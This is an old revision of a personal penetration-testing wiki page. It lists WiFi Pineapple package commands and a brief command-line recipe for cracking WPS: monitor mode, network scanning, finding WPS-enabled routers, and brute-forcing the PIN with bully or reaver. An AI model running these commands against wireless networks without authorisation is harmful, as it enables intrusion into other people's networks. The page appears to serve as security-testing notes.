pentest:start
This is an old revision of the document!
Install Packages in Pineapple
opkg udpate
opkg install …
opkg list-installed
opkg remove …
Crack WPS
# Start monitor interface
airmon-ng start wlan0
# Check for WLAN networks nearby
airodump-ng mon0
# Check for WPS enabled devices
wash -i mon0 –ignore-fcs
# Bully for bruteforce attack of WPS key
bully -B mon0 -o <outputfile> -b <BSSID>
Alternative\\
reaver -i mon0 -vv -b <BSSID>
pentest/start.1414733609.txt · Last modified: 2014/10/31 05:33 by michaelurspringer